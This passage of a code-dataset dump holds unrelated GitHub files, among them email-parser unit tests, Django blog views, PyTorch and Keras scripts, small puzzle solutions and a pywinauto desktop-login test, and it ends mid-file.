dot_separated_names):\n return functools.reduce(getattr, [obj] + dot_separated_names.split(\".\"))\n\n\ndef call_with_remap(\n function: Callable,\n data: Dict[str, Any],\n in_map: Union[List[str], Dict[str, str]],\n out_map: Optional[Union[str, List[str]]] = None,\n overwrite: bool = False,\n):\n if isinstance(in_map, list) or isinstance(in_map, ListConfig):\n # get and remap list inputs\n 
inputs = [data[key] if isinstance(key, str) else key for key in in_map]\n in_cols = in_map\n # process data\n result = function(*inputs)\n elif isinstance(in_map, dict) or isinstance(in_map, DictConfig):\n # get and remap dict inputs\n inputs = {\n key: data[val] if isinstance(val, str) else val\n for key, val in in_map.items()\n }\n in_cols = in_map.values()\n # process data\n result = function(**inputs)\n else:\n raise TypeError(\n f\"Type of in_map has to be either dict for keyword arguments or list. \"\n f\"for positional arguments, but got {type(in_map)}.\"\n )\n\n # remap outputs\n if out_map is not None:\n if isinstance(result, tuple):\n assert isinstance(out_map, list) or isinstance(\n out_map, ListConfig\n ), f\"Function returns multiple objects, out_map has to be list.\"\n assert len(result) == len(\n out_map\n ), f\" Amount of result items and out_map items must be the same, but {len(result)} and {len(out_map)}.\"\n # check that out_map names is not in data\n for name in out_map:\n assert (\n overwrite or name not in data or name in in_cols or name == \"_\"\n ), f\"Result key {name} is going to overwrite correspondent name in input data.\"\n result = {key: val for key, val in zip(out_map, result) if key != \"_\"}\n else:\n assert isinstance(\n out_map, str\n ), f\"Function doesn't return multiple objects, out_map has to be single str.\"\n if out_map != \"_\":\n assert (\n overwrite or out_map not in data or out_map in in_cols\n ), f\"Result key {out_map} is going to overwrite correspondent name in input data.\"\n result = {out_map: result}\n else:\n # if out_map is not specified - use the same name as input\n assert not isinstance(\n result, tuple\n ), f\"Can't infer output name, please, specify out_map.\"\n result = {list(in_map.values())[0]: result}\n return result","repo_name":"quickjkee/t2i_sd","sub_path":"consistency_models-sd/cm/yt/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"167050819","text":"try:\n import address_parser\nexcept:\n import mail.catdog.address_parser.cython.address_parser as address_parser\n\nimport unittest\n\n\nclass Base(unittest.TestCase):\n def check_recipient(self, recipients, size=1, at=0, **kwargs):\n self.assertEqual(len(recipients), size)\n rec = recipients[at]\n\n self.assertEqual(rec.display_name, kwargs['display_name'])\n self.assertEqual(rec.local, kwargs['local'])\n self.assertEqual(rec.domain, kwargs['domain'])\n self.assertEqual(rec.email, kwargs['email'])\n self.assertEqual(rec.valid, kwargs['valid'])\n\n\nclass CheckAddressParserDomainAndDisplayNameConditions(Base):\n def test_parse_single_address_without_display_name(self):\n self.check_recipient(address_parser.parse_recipients('a@yandex.ru'),\n display_name='', local='a', domain='yandex.ru', email='a@yandex.ru', valid=True)\n\n def test_address_with_display_name(self):\n self.check_recipient(address_parser.parse_recipients('\"Ололо, привет\" a@yandex.ru'),\n display_name='\"Ололо, привет\"', local='a', domain='yandex.ru',\n email='\"Ололо, привет\" ', valid=True)\n\n def test_parse_address_with_russian_domain(self):\n self.check_recipient(address_parser.parse_recipients('a@яндекс.рф'),\n display_name='', local='a', domain='яндекс.рф', email='a@яндекс.рф', valid=True)\n\n def test_parse_address_with_punycode_domain(self):\n self.check_recipient(address_parser.parse_recipients('a@xn--d1acpjx3f.xn--p1ai'),\n display_name='', local='a', 
domain='xn--d1acpjx3f.xn--p1ai',\n email='a@xn--d1acpjx3f.xn--p1ai', valid=True)\n\n def test_local_and_domain_to_lower_case(self):\n self.check_recipient(address_parser.parse_recipients('A@Yandex.ru'),\n display_name='', local='a', domain='yandex.ru', email='a@yandex.ru', valid=True)\n\n\nclass ValidAndInvalidCases(Base):\n def test_valid_email_with_display_name(self):\n self.check_recipient(address_parser.parse_recipients('\"Hello, world\" '),\n display_name='\"Hello, world\"', local='a', domain='yandex.ru',\n email='\"Hello, world\" ', valid=True)\n\n def test_valid_email_with_display_name_without_angle_brackets(self):\n self.check_recipient(address_parser.parse_recipients('\"Hello, world\" a@yandex.ru'),\n display_name='\"Hello, world\"', local='a', domain='yandex.ru',\n email='\"Hello, world\" ', valid=True)\n\n def test_invalid_email_with_empty_local(self):\n self.check_recipient(address_parser.parse_recipients('\"Hello, world\" @yandex.ru'),\n display_name='', local='\"hello, world\"', domain='yandex.ru',\n email='\"hello, world\"@yandex.ru', valid=False)\n\n self.check_recipient(address_parser.parse_recipients('\"Hello, world\" <@yandex.ru>'),\n display_name='', local='', domain='', email='\"Hello, world\" <@yandex.ru>', valid=False)\n\n def test_invalid_email_with_empty_domain(self):\n s = '\"Hello, world\" a@'\n self.check_recipient(address_parser.parse_recipients(s),\n display_name='', local='', domain='', email=s, valid=False)\n\n def test_invalid_yandex_email(self):\n self.check_recipient(address_parser.parse_recipients('_@ya.ru'),\n display_name='', local='_', domain='ya.ru', email='_@ya.ru', valid=False)\n\n self.check_recipient(address_parser.parse_recipients('_@mail.ru'),\n display_name='', local='_', domain='mail.ru', email='_@mail.ru', valid=True)\n\n def test_invalid_percent_hack_email(self):\n s = 'ololo a%b.ru@ya.ru'\n self.check_recipient(address_parser.parse_recipients(s),\n display_name='ololo', local='a%b.ru', domain='ya.ru', email='ololo ', valid=False)\n\n\nclass GroupParsingCases(Base):\n def test_valid_two_emails(self):\n a = address_parser.parse_recipients('\"Hello, world\" , \"World, hello\" ')\n self.check_recipient(a, size=2, at=0,\n display_name='\"Hello, world\"', local='a', domain='yandex.ru',\n email='\"Hello, world\" ', valid=True)\n self.check_recipient(a, size=2, at=1,\n display_name='\"World, hello\"', local='b', domain='mail.ru',\n email='\"World, hello\" ', valid=True)\n\n def test_three_emails_the_second_is_invalid(self):\n a = address_parser.parse_recipients('\"Hello, world\" , \"World, hello\" <_@yandex.ru>, c@ya.ru')\n self.check_recipient(a, size=3, at=0,\n display_name='\"Hello, world\"', local='a', domain='yandex.ru',\n email='\"Hello, world\" ', valid=True)\n self.check_recipient(a, size=3, at=1,\n display_name='\"World, hello\"', local='_', domain='yandex.ru',\n email='\"World, hello\" <_@yandex.ru>', valid=False)\n self.check_recipient(a, size=3, at=2,\n display_name='', local='c', domain='ya.ru',\n email='c@ya.ru', valid=True)\n\n def test_email_is_garbage(self):\n self.check_recipient(address_parser.parse_recipients('asdfasdfasd fasdfajsdf'),\n display_name='', local='', domain='', email='asdfasdfasd fasdfajsdf', valid=False)\n\n def test_email_with_garbage(self):\n a = address_parser.parse_recipients('a@ya.ru, asdfasdfasd fasdfajsdf, c@ya.ru')\n self.check_recipient(a, size=2, at=0,\n display_name='', local='a', domain='ya.ru', email='a@ya.ru', valid=True)\n\n self.check_recipient(a, size=2, at=1,\n display_name='', local='', 
domain='', email='a@ya.ru, asdfasdfasd fasdfajsdf, c@ya.ru', valid=False)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/test_address_parser.py","file_name":"test_address_parser.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72752037034","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, Http404\nfrom django.urls import reverse, reverse_lazy\nfrom django.utils.text import slugify\nfrom django.contrib import messages\nfrom django.core.exceptions import PermissionDenied\n\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views.generic import ListView, CreateView, DetailView, DeleteView\n\nfrom django.utils.translation import ugettext as _\nfrom django.utils.translation import ungettext\nfrom django.core.paginator import Paginator, EmptyPage\nfrom datetime import datetime\nfrom blog.models import Article\nfrom .forms import ArticleForm\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.auth.models import Permission\nfrom django.contrib.contenttypes.models import ContentType\n\n# def home(request):\n# articles = Article.objects.all()\n#\n# return render(request, 'blog/home.html.twig',locals())\n\nclass DeleteArticle(DeleteView):\n model = Article\n template_name = 'blog/delete_article.html.twig'\n context_object_name = 'article'\n success_url = reverse_lazy('home')\n\n def get_object(self, queryset = None):\n slug = self.kwargs['slug']\n return get_object_or_404(Article, slug = slug)\n\nclass DetailArticle(DetailView):\n model = Article\n template_name = 'blog/read.html.twig'\n\ndef test_i18n(request):\n nb_chats = 1\n couleur = 'blanc'\n chaine = _('Bonjour les nouveaux !')\n ip = _('Votre ip est %s') % request.META['REMOTE_ADDR']\n infos = ungettext('... et selon mes infos , vous avez %(nb)d chat %(col)s',\n '... 
et selon mes infos , vous avez %(nb)d chats %(col)ss', nb_chats) % {'nb':nb_chats, 'col':couleur}\n return render(request, 'blog/i18n.html.twig', locals())\n\n@permission_required('blog.add_article')\ndef createArticle(request):\n if request.method == 'POST':\n form = ArticleForm(request.POST)\n if form.is_valid():\n cleaned_data = form.cleaned_data\n a = Article(titre = cleaned_data['titre'],\n content= cleaned_data['content'],\n auteur = request.user,\n categorie = cleaned_data['categorie'])\n a.save()\n contenttype = ContentType.objects.get(app_label = 'blog', model = 'Article')\n perm1 = Permission.objects.create(\n codename = 'change_article_%d'%a.id,\n name = \"Modifier l'article %d\"%a.id,\n content_type = contenttype\n )\n perm2 = Permission.objects.create(\n codename = 'delete_article_%d'%a.id,\n name = \"Supprimer l'article %d\"%a.id,\n content_type = contenttype\n )\n request.user.user_permissions.add(perm1)\n request.user.user_permissions.add(perm2)\n\n messages.success(request, 'L\\'article \"%s\" a bien été ajouté !'%cleaned_data['titre'])\n return redirect(reverse('article_by_slug', kwargs = {'slug':a.slug}))\n form = ArticleForm(request.POST or None)\n return render(request, 'blog/article_form.html.twig', locals())\n\n\n\n@permission_required('blog.change_article')\ndef updateArticle(request, slug):\n a = get_object_or_404(Article, slug = slug)\n if request.user.has_perm('blog.change_article_%d'%(a.id)):\n if request.method == 'POST':\n form = ArticleForm(request.POST)\n if form.is_valid():\n cleaned_data = form.cleaned_data\n a.titre = cleaned_data['titre']\n a.content= cleaned_data['content']\n a.auteur = request.user\n a.categorie = cleaned_data['categorie']\n a.save()\n\n messages.success(request, 'L\\'article \"%s\" a bien été modifié !'%cleaned_data['titre'])\n return redirect(reverse('article_by_slug', kwargs = {'slug':a.slug}))\n form = ArticleForm(instance = a)\n return render(request, 'blog/article_form.html.twig', locals())\n else:\n raise PermissionDenied\n\ndef listArticles(request, page = 1):\n articles = Article.objects.order_by('-date')\n pages = Paginator(articles, 5)\n try:\n articles = pages.page(page)\n except EmptyPage:\n articles = pages.page(pages.num_pages)\n return render(request, 'blog/home.html.twig', locals())\n\ndef userArticles(request, page = 1):\n articles = Article.objects.filter(auteur=request.user).order_by('-date')\n pages = Paginator(articles, 5)\n try:\n articles = pages.page(page)\n except EmptyPage:\n articles = pages.page(pages.num_pages)\n return render(request, 'blog/home.html.twig', locals())\n\n\n\ndef read_article_by_slug(request, slug):\n article = get_object_or_404(Article, slug=slug)\n return render(request, 'blog/read.html.twig', {'article':article})\n\n\ndef read_article(request, id):\n article = get_object_or_404(Article, id=id)\n return render(request, 'blog/read.html.twig', {'article':article})\n","repo_name":"Bozo-max/crepes_bretonnes","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34623403481","text":"meses = [\"janeiro\", \"fevereiro\", \"marco\", \"abril\", \"maio\", \"junho\", \"julho\", \"agosto\", \"setembro\", \"outubro\", \"novembro\", \"dezembro\"]\nlistaPluviosidade = []\nmesesNovos = []\n\nfor mes in meses:\n print(\"pluviosidade do mes\", mes, \": \", end=\"\")\n pluviosidade = int(input(\"\"))\n listaPluviosidade.append(pluviosidade)\n\ndef 
funPluviosidade(meses, listaPluviosidade, mesesNovos):\n copiaLista = listaPluviosidade.copy()\n copiaLista.sort()\n for n in copiaLista:\n mesesNovos.append(meses[listaPluviosidade.index(n)])\n print(\" \")\n for i in range(len(meses)):\n print(\"pluviosidade do mes \", mesesNovos[i], \": \", copiaLista[i])\nfunPluviosidade(meses, listaPluviosidade, mesesNovos)","repo_name":"Mohaamedl/Exs-py","sub_path":"ficha6/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35936693845","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom nn.switchnet import SwitchForward, SwitchInverse\nfrom loss.customloss import CMSELoss\nfrom data.cranddataset import CRandDataset\nfrom data.scattering.scattering import ScatteringDataSet\nfrom train.train import ctrain_loop, ctest_loop\n\n# N - M + w - 1 should be even\nt = 4\nPd = 3**2\nPx = 9**2\nN = 81\nw = 11\nalpha = 24\nL = 3\nM = 81\nNsample = 1024\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nlearning_rate = 0.002\nbatch_size = 64\nepoches = 5\n\nfilename = 'data/scafull2.h5'\ntrain_data = ScatteringDataSet(filename)\ntrain_dataloader = DataLoader(train_data, batch_size=batch_size)\ntestfile = 'data/scafull2_test.h5'\ntest_data = ScatteringDataSet(testfile)\ntest_dataloader = DataLoader(test_data, batch_size=1)\n\nmodel = SwitchForward(t, Pd, Px, N, w, alpha, L, M, device).float()\nloss_fn = CMSELoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n\nctrain_loop(train_dataloader, model, loss_fn, optimizer, epoches=epoches)\nctest_loop(test_dataloader, model, loss_fn)","repo_name":"qiyuanpang/codes","sub_path":"test_switchnet.py","file_name":"test_switchnet.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36415766618","text":"#!/usr/bin/python3\n\ndef magic_calculation(a, b):\n \"\"\"My magic calculation function\n\n Translated from bytecode\n Makes use of add() and sub() functions from magic_calculation_102 module\n\n Args:\n a: first integer\n b: second integer\n\n Returns:\n The resulting value of sub(a, b) or c\n \"\"\"\n from magic_calculation_102 import add, sub\n\n if a < b:\n c = add(a, b)\n else:\n return sub(a, b)\n\n for i in range(4, 6):\n c = add(c, i)\n return c\n","repo_name":"chee-zaram/alx-higher_level_programming","sub_path":"0x02-python-import_modules/102-magic_calculation.py","file_name":"102-magic_calculation.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72933504553","text":"import sys\nimport os\nimport time\n\nimport numpy as np\nimport theano\nimport theano.tensor as T\n#from theano.compile.nanguardmode import NanGuardMode\nimport numpy as np\n\nimport lasagne as nn\n\nimport importlib.util\n\nfrom datetime import datetime, timedelta\nimport pickle\nimport string\n\nimport matplotlib\nmatplotlib.use('agg')\nimport pylab as plt\n\nimport generators\nfrom utils import accounting\nfrom utils import train_utils\nfrom utils import network_repr\n\nimport simple_spearmint\n\nif len(sys.argv) < 2:\n sys.exit(\"Usage: train_by_spearmint.py \")\n\nmodel_config = sys.argv[1]\nmodel_path_name = os.path.join(os.path.expanduser(os.getcwd()),'models',model_config)\nspec = importlib.util.spec_from_file_location(model_config, 
model_path_name)\nmodel_module = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(model_module)\n \nexpid = accounting.generate_expid(model_config)\nexpid = expid.split('/')[-1]\nprint(\"Experiment ID: \", expid)\n\nprint(\"...get the relevant model paremeter search space, set up spearmint\")\nmodel_params_dict = model_module.model_params_dict\nss = simple_spearmint.SimpleSpearmint(model_params_dict, minimize=False)\n\n# Define an objective function, must return a scalar value\ndef objective(params_dict, model_module):\n \n try:\n print(\"...Build model\")\n model = model_module.build_model(params_dict)\n except:\n print(\"Model configuration was invalid, trying another one...\")\n return 0.1\n\n if len(model) == 4:\n l_in, l_out, l_resume, l_exclude = model\n elif len(model) == 3:\n l_in, l_out, l_resume = model\n l_exclude = l_in\n else:\n l_in, l_out = model\n l_resume = l_out\n l_exclude = l_in\n\n\n all_layers = nn.layers.get_all_layers(l_out)\n num_params = nn.layers.count_params(l_out)\n\n print(\"...number of parameters: \", num_params)\n\n x_shared = nn.utils.shared_empty(dim=len(l_in.output_shape)) \n y_shared = nn.utils.shared_empty(dim=2) \n t = nn.utils.shared_empty(dim=2) ### target shared var per batch\n valid_output = nn.layers.get_output(l_out, deterministic=True) ### no dropout for validation \n\n idx = T.lscalar('idx')\n\n givens = {\n t: y_shared[idx*model_module.batch_size:(idx+1)*model_module.batch_size],\n l_in.input_var: x_shared[idx*model_module.batch_size:(idx+1)*model_module.batch_size],\n }\n\n if hasattr(model_module, 'build_objective'):\n train_loss = model_module.build_objective(l_in, l_out, t, training_mode=True)\n else:\n train_loss = nn.objectives.aggregate(nn.objectives.binary_crossentropy(l_out, t))\n\n all_excluded_params = nn.layers.get_all_params(l_exclude)\n all_params = nn.layers.get_all_params(l_out)\n all_params = list(set(all_params) - set(all_excluded_params))\n\n if hasattr(model_module, 'learning_rate_schedule'):\n learning_rate_schedule = model_module.learning_rate_schedule\n else:\n learning_rate_schedule = { 0: model_module.learning_rate }\n \n learning_rate = theano.shared(np.float32(learning_rate_schedule[0]))\n\n if hasattr(model_module, 'build_updates'):\n updates = model_module.build_updates(train_loss, all_params, learning_rate, model_module.momentum)\n else:\n updates = nn.updates.rmsprop(train_loss, all_params, learning_rate, 0.9)\n\n if hasattr(model_module, 'censor_updates'):\n updates = model_module.censor_updates(updates, l_out)\n\n iter_train = theano.function([idx], train_loss, givens=givens, updates=updates)\n compute_output = theano.function([idx], valid_output, givens=givens, on_unused_input=\"ignore\") \n chunks_train_idcs = range(model_module.num_chunks_train)\n losses_valid_auc = []\n losses_valid_aupr = []\n losses_train = []\n losses_valid_log = []\n\n model_module.data_loader.load_train()\n\n if hasattr(model_module, 'task_type'):\n task_type = model_module.task_type\n else:\n task_type = 'mt_classification'\n\n if hasattr(model_module, 'create_train_gen'):\n create_train_gen = model_module.create_train_gen\n else:\n create_train_gen = lambda: model_module.data_loader.create_batch_gen()\n\n if hasattr(model_module, 'create_valid_gen'):\n create_valid_gen = model_module.create_valid_gen\n else:\n create_valid_gen = lambda: model_module.data_loader.create_valid_gen()\n\n if hasattr(model_module, 'num_epochs'):\n num_epochs = model_module.num_epochs\n else:\n num_epochs = 15\n \n print(\"...Training model 
for \", num_epochs, \" epochs (less early stopping)\")\n num_batches_chunk = model_module.chunk_size // model_module.batch_size\n\n for epoch in range(num_epochs):\n\n ### train in chunks\n epoch_train_loss = []\n epoch_start_time = time.time()\n for e, (x_chunk, y_chunk) in zip(chunks_train_idcs, create_train_gen()):\n \n if e in learning_rate_schedule:\n lr = np.float32(learning_rate_schedule[e])\n learning_rate.set_value(lr)\n \n x_shared.set_value(x_chunk)\n y_shared.set_value(y_chunk)\n losses = []\n for b in range(num_batches_chunk):\n loss = iter_train(b)\n outs = compute_output(b)\n if np.isnan(loss):\n raise RuntimeError(\"NaN DETECTED.\")\n losses.append(loss)\n \n mean_train_loss = np.mean(losses)\n epoch_train_loss.append(mean_train_loss)\n \n epoch_end_time = time.time()\n losses_train.append(epoch_train_loss)\n print(\"Mean training loss:\\t\\t {0:.6f}.\".format(np.mean(epoch_train_loss))) ### dump these to a text file somewhere else...\n print(\"Training for epoch \", epoch, \" took \", epoch_end_time - epoch_start_time, \"s\", flush=True)\n \n ### Do we validate?\n if ((epoch + 1) % model_module.validate_every) == 0:\n print(\"Validating...\")\n \n outputs = []\n labels = []\n for x_chunk_valid, y_chunk_valid in create_valid_gen():\n num_batches_chunk_valid = x_chunk_valid.shape[0] // model_module.batch_size\n\n x_shared.set_value(x_chunk_valid)\n\n outputs_chunk = []\n for b in range(num_batches_chunk_valid):\n out = compute_output(b)\n outputs_chunk.append(out)\n\n outputs_chunk = np.vstack(outputs_chunk)\n #outputs_chunk = outputs_chunk[:chunk_length_eval] # truncate to the right length\n outputs.append(outputs_chunk)\n labels.append(y_chunk_valid)\n\n\n outputs = np.vstack(outputs) ### dump these to a list, pickle the list\n loss = train_utils.log_loss(outputs, np.vstack(labels))\n if task_type != 'mt_classificaiton':\n acc = train_utils.st_accuracy(outputs, np.vstack(labels))\n else:\n acc = train_utils.mt_accuracy(outputs, np.vstack(labels))\n precision = train_utils.mt_avg_precision(outputs, np.vstack(labels))\n print(\" validation loss:\\t {0:.6f}.\".format(loss)) ### dump these to a text file somewhere else\n print(\" validation roc:\\t {0:.2f}.\".format(acc * 100))\n losses_valid_log.append(loss)\n losses_valid_auc.append(acc)\n del outputs\n \n return max(losses_valid_auc)\n\n\n# Seed with 5 randomly chosen parameter settings\n# (this step is optional, but can be beneficial)\nfor n in range(5):\n # Get random parameter settings\n suggestion = ss.suggest_random()\n \n # Retrieve an objective value for these parameters\n value = objective(suggestion, model_module)\n print(\"Random trial {}: {} -> {}\".format(n + 1, suggestion, value))\n \n # Update the optimizer on the result\n ss.update(suggestion, value)\n\n# Run for 50 hyperparameter optimization trials\nfor n in range(50):\n \n # Get a suggestion from the optimizer\n suggestion = ss.suggest()\n \n # Get an objective value\n value = objective(suggestion, model_module)\n print(\"GP trial {}: {} -> {}\".format(n + 1, suggestion, value))\n \n # Update the optimizer on the result\n ss.update(suggestion, value)\n best_parameters, best_objective = ss.get_best_parameters()\n print(\"Best parameters {} for objective {}\".format(best_parameters, best_objective))\n\n \n \n","repo_name":"lzamparo/SeqDemote","sub_path":"src/train_by_spearmint.py","file_name":"train_by_spearmint.py","file_ext":"py","file_size_in_byte":8515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 
+{"seq_id":"10393013189","text":"# https://www.acmicpc.net/problem/3009\n\nx, y = [], []\nfor _ in range(3):\n s = input().split()\n x.append(s[0])\n y.append(s[1])\n\nfor p in x:\n if x.count(p) <= 1:\n x.append(p)\n break\n\nfor q in y:\n if y.count(q) <= 1:\n y.append(q)\n break\n\nprint(f'{x[-1]} {y[-1]}')\n","repo_name":"beyondthemist/Problem-solving-solution","sub_path":"BAEKJOON/03009/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1672210726","text":"import sys\r\n\r\nN = int(input())\r\ninfo = []\r\nfor _ in range(N):\r\n info.append(list(map(int, sys.stdin.readline().strip().split())))\r\n\r\ninfo.sort(key=lambda i: i[2], reverse=True)\r\n\r\ngold, silver = [info[0][0], info[0][1]], [info[1][0], info[1][1]]\r\n\r\nbronze = []\r\nif gold[0] != silver[0]:\r\n bronze = [info[2][0], info[2][1]]\r\nelse:\r\n filtered = [x for x in info if x[0] != gold[0]]\r\n bronze = [filtered[0][0], filtered[0][1]]\r\n\r\nprint(*gold)\r\nprint(*silver)\r\nprint(*bronze)\r\n","repo_name":"slackjawed12/codetest","sub_path":"백준/Silver/2535. 아시아 정보올림피아드/아시아 정보올림피아드.py","file_name":"아시아 정보올림피아드.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42220141110","text":"import sys\nfrom loginScreen import loginScreen\nfrom createUser import Ui_MainWindow\nfrom PyQt5 import QtCore, QtWidgets\nimport database as db\n\nclass Main(QtWidgets.QMainWindow):\n def __init__(self, parent=None):\n super(Main, self).__init__()\n \n # build ui\n self.ui = loginScreen()\n self.ui.setupUi(self)\n\n # connect signals\n self.ui.pushButton.clicked.connect(self.on_login_button)\n self.ui.pushButton_2.clicked.connect(self.on_singup_button)\n self.ui.pushButton_3.clicked.connect(self.on_exit_button)\n\n def on_singup_button(self):\n self.dialog = Ui_MainWindow()\n self.dialog.setupUi(self.dialog)\n self.dialog.show() \n\n self.dialog.pushButton.clicked.connect(self.on_register_button)\n self.dialog.pushButton_2.clicked.connect(self.on_back_button)\n\n def on_exit_button(self):\n sys.exit()\n\n def on_back_button(self):\n self.dialog.close()\n \n def on_register_button(self):\n u = self.dialog.lineEdit.text()\n p = self.dialog.lineEdit_2.text()\n e = self.dialog.lineEdit_3.text()\n n = self.dialog.lineEdit_4.text()\n\n db.createUser(u, p, e, n)\n\n def on_login_button(self):\n if db.contains(self.ui.lineEdit.text(), self.ui.lineEdit_2.text()):\n print(\"it is there\")\n else:\n print(\"it's not in the database\")\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n main = Main()\n main.show()\n sys.exit(app.exec_())","repo_name":"sorazy/vets-and-pets","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"233668848","text":"# on google colab make runtime type to GPU\n# !pip install --upgrade keras-cv\n\n# Model\nfrom tensorflow import keras\nimport keras_cv\nkeras.mixed_precision.set_global_policy(\"mixed_float16\")\n\n# Visualization\nimport matplotlib.pyplot as plt\n\n# Save the image\nfrom PIL import Image\n\n# Create a model\nmodel = keras_cv.models.StableDiffusion(img_height=512, \n img_width=512,\n jit_compile=True)\ndef plot_images(images):\n # Set figure size\n plt.figure(figsize=(20, 20))\n # Loop through each image\n 
for i in range(len(images)):\n # Subplot setup\n ax = plt.subplot(1, len(images), i + 1)\n # Plot each image\n plt.imshow(images[i])\n # Do not show axis\n plt.axis(\"off\")\n\n\n# Create images from text\nimages = model.text_to_image(prompt=\"Max in his cozy little hole in the wall\",\n batch_size=2)\n\n# Plot the images\nplot_images(images)\n","repo_name":"ebdeuslave/public_apps","sub_path":"ai_pic_generator.py","file_name":"ai_pic_generator.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31438658764","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 4 16:12:44 2023\n\n@author: PC\n\"\"\"\n\nimport numpy as np\n\n# Example arrays\narray1 = np.array([[0.1, 0.6],\n [0.3, 0.8]])\n\narray2 = np.array([[0.4, 0.2],\n [0.7, 0.9]])\n\narray3 = np.array([[0.2, 0.3],\n [0.6, 0.5]])\n\narray4 = np.array([[0.5, 0.2],\n [0.1, 0.4]])\n\narray5 = np.array([[0.5, 0.1],\n [0.9, 0.7]])\n\n# List of arrays\narrays = [array1, array2, array3, array4, array5]\n\n# Convert the list of arrays into a single NumPy array\narrays = np.array(arrays)\n\n# Find the maximum values along the specified axis (axis=0 for elementwise comparison)\nmax_values = np.max(arrays, axis=0)\n\n# Create a mask indicating where the maximum values are above 0.5\nmask = max_values > 0.5\n\n# Initialize an output array with zeros\noutput = np.zeros_like(max_values)\n\n# Assign values based on the conditions\nfor i in range(len(arrays)):\n output[np.logical_and(mask, max_values == arrays[i])] = i + 1\n\n# Print the resulting output array\nprint(output)","repo_name":"andreasaspe/Thesis_code","sub_path":"Other_scripts/How_the_logic_works_in_finding_full_segmentation.py","file_name":"How_the_logic_works_in_finding_full_segmentation.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42642258417","text":"def areInc(guess):\n last = -1\n for d in str(guess):\n if int(d) < last:\n return False\n last = int(d)\n return True\n\ndef existSame(guess):\n last = \"A\"\n for d in str(guess):\n if d == last:\n return True\n last = d\n return False\n\ndef existSame2(guess):\n last = \"A\"\n foundPair = False\n tooMany = False\n for d in str(guess):\n if d == last:\n if foundPair == True:\n tooMany = True\n else:\n foundPair = True\n elif foundPair == True and tooMany == False:\n return True\n else:\n foundPair = False\n tooMany = False\n last = d\n return foundPair == True and tooMany == False\n\ndef checkGuess(guess):\n return areInc(guess) and existSame2(guess)\n\nwith open(\"4.input.txt\", \"r\") as f:\n range = f.read().split(\"-\")\n min = int(range[0])\n max = int(range[1])\n\n# min = 112233\n# max = 112233\n\nguess = 0\nif guess < min:\n guess = min\n\npossibleCount = 0\nwhile guess <= max:\n if checkGuess(guess) == True:\n possibleCount += 1\n guess += 1\nprint(\"Possible passwords {0}\".format(possibleCount))\n\n# P1\n\n# L 2185\n# H 2269\n# C 2220\n\n# P2\n\n# C 1515","repo_name":"hotscotch92/advent-of-code","sub_path":"2019/4 - password/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"549458618","text":"from pywinauto import Application, WindowSpecification\nfrom time import sleep\nfrom config.operation_yaml import OperathionYAML\nimport allure\nimport pytest\nimport os\n\n# 参数\nteacher_login_data = 
OperathionYAML().read_yaml('teacher_login.yaml')\npath = teacher_login_data['init']['path']\nphone_num = teacher_login_data['login_success']['phone_num']\ncaptcha = teacher_login_data['login_success']['captcha']\n\n\n@allure.feature('教师端登录')\nclass TestTeacherLogin:\n @classmethod\n def setup_class(cls):\n # Launch the client if it is not already open\n cls.app = Application(backend='uia').start(path)\n\n # Select the main window of the home page\n cls.dlg = cls.app['员工登录 - 贝尔云课堂']\n # Child windows of the home page\n cls.document = cls.dlg.window(control_type='Document')\n cls.titleBar = cls.dlg.window(control_type='TitleBar')\n # self.document.print_control_identifiers()\n\n # Successful login\n @allure.step('登录成功')\n # @pytest.mark.dependency(name='teacher_login')\n @pytest.mark.run(order=1)\n def test_login_success(self):\n # Enter the account credentials, then click login\n input_phone = self.document.child_window(title=\"请输入手机号\", control_type=\"Edit\")\n input_phone.wait('ready')\n # WindowSpecification.print_control_identifiers(input_phone)\n input_phone.type_keys(phone_num)\n # Captcha\n input_captcha = self.document.child_window(control_type='Table').child_window(title=\"请输入验证码\", control_type=\"Edit\")\n input_captcha.wait('ready')\n input_captcha.type_keys(captcha)\n # Login button\n login_btn = self.document.child_window(title=\"登 录\", control_type=\"Button\")\n login_btn.click()\n\n # Wait for the 